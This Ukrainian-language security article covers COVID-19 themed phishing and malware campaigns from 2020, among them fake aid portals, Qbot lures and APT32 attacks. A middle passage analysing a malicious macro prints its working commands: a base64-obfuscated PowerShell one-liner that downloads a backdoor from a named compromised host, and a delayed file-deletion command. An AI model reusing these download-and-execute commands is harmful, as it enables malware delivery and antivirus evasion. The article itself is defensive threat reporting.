Зловмисники продовжують експлуатувати тему COVID-19, створюючи все нові й нові загрози для користувачів, які цікавляться всім, що стосується епідемії. У ми вже говорили про те, які різновиди шкідливого програмного забезпечення з'явилися на хвилі коронавірусу, а сьогодні йтиметься про прийоми соціальної інженерії, з якими вже зіткнулися користувачі в різних країнах, а також у Росії. Загальні тенденції та приклади – під катом.
Пам'ятайте ми говорили про те, що люди охоче читають не лише про коронавірус та перебіг епідемії, а й про заходи фінансової підтримки? Ось приклад. У німецькому штаті Північна Рейн-Вестфалія (North Rhine-Westphalia або NRW) було виявлено цікаву фішингову атаку. Зловмисники створили копії сайту міністерства економіки (), де будь-хто може зробити заявку на отримання матеріальної допомоги. Така програма реально існує, і це виявилося на руку шахраям. Отримавши персональні дані своїх жертв, вони робили заявку вже на цьому сайті міністерства, але вказували інші банківські реквізити. За офіційними даними, було зроблено 4 тис таких фальшивих запитів, поки схема не була розкрита. В результаті $109 мільйонів, призначених для постраждалих громадян, потрапили до рук шахраїв.
Безкоштовний тест на COVID-19 не бажаєте?
Інший показовий приклад фішингу на тему коронавірусу був у електронних листах. Повідомлення привертали увагу користувачів пропозицією пройти безкоштовне тестування щодо зараження коронавірусом. У вкладенні цих знаходилися екземпляри Trickbot/Qakbot/Qbot. І коли охочі перевірити своє здоров'я приступали до заповнення доданої форми, на комп'ютер завантажувався шкідливий скрипт. А щоб уникнути перевірки методом сендбоксингу, скрипт приступав до завантаження основного вірусу лише через деякий час, коли системи захисту переконувалися, що жодної шкідливої активності не відбувається.
Переконати більшість користувачів у необхідності увімкнути макроси теж було нескладно. Для цього застосовувався стандартний трюк, коли для заповнення анкети потрібно спочатку дозволити макроси, а значить запустити скрипт VBA.
Як ви можете побачити, скрипт VBA спеціально маскується від антивірусів.
У Windows є функція очікування, коли програма чекає /T <секунд>, перш ніж прийняти відповідь “Так” за промовчанням. У нашому випадку скрипт чекав 65 секунд, перш ніж видалити тимчасові файли:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
А в процесі очікування відбувалося завантаження шкідливого програмного забезпечення. Для цього було запущено спеціальний скрипт PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Після декодування значення Base64 скрипт PowerShell завантажує бекдор, що знаходиться на попередньо зламаному веб-сервері з Німеччини:
http://automatischer-staubsauger.com/feature/777777.pngі зберігає його під ім'ям:
C:UsersPublictmpdirfile1.exe
Папка ‘C:UsersPublictmpdir’ видаляється при запуску файлу 'tmps1.bat', який містить команду cmd /c mkdir ""C:UsersPublictmpdir"".
Цільова атака на державні структури
Крім цього, нещодавно аналітики FireEye повідомили про цільову атаку APT32, спрямовану на урядові структури Уханя, а також Міністерство Невідкладної Допомоги Китаю (Chinese Ministry of Emergency Management). В одному з RTF, що розпізнавала, містилося посилання на статтю з New York Times під назвою . Однак при її прочитанні відбувалося завантаження шкідливого ПЗ (Аналітики FireEye ідентифікували екземпляр як METALJACK).
Цікаво, що на момент виявлення жоден з антивірусів не детектував цей екземпляр згідно з даними Virustotal.
Коли офіційні сайти “лежать”
Найяскравіший приклад фішингової атаки стався у Росії буквально днями. Приводом для цього стало призначення довгоочікуваної допомоги на дітей віком від 3 до 16 років. Коли було оголошено про старт прийому заяв 12 травня 2020 року, мільйони рвонули на сайт Держпослуги за довгоочікуваною допомогою і обрушили портал не гірше за професійну DDoS-атаку. Коли президент сказав, що "Держпослуги не впоралися з потоком заявок", у мережі заговорили про те, що запрацював альтернативний сайт прийому заяв.
Проблема полягає в тому, що сайтів запрацювало відразу кілька, і поки що один, справжній за адресою posobie16.gosuslugi.ru дійсно приймає заяви, ще .
Колеги із «СерчІнформ» знайшли близько 30 нових шахрайських доменів у зоні .ru. Infosecurity a Softline Company відстежили понад 70 подібних фейкових сайтів держпослуг із початку квітня. Їхні творці маніпулюють звичною символікою, а також використовують комбінації зі слів gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie і так далі.
Ажіотаж та соціальна інженерія
Усі ці приклади лише підтверджують, що зловмисники успішно монетизують тематику коронавірусу. І чим вища соціальна напруга і чим більше неясних питань, тим більше шансів у шахраїв вкрасти важливі дані, змусити людей самостійно віддати свої гроші або просто зламати більше комп'ютерів.
А з огляду на те, що пандемія змусила потенційно не готових до цього людей масово працювати з дому, в зоні ризику виявляються не лише особисті, а й корпоративні дані. Наприклад, нещодавно користувачі Microsoft 365 (колишнього Office 365) також зазнали фішингової атаки. Людям масово надходили голосові “пропущені” повідомлення у вкладеннях до листів. Однак фактично файли були HTML-сторінкою, яка відправляла жертв атаки на . Як наслідок – втрата доступу та компрометація всіх даних з облікового запису.
Джерело: habr.com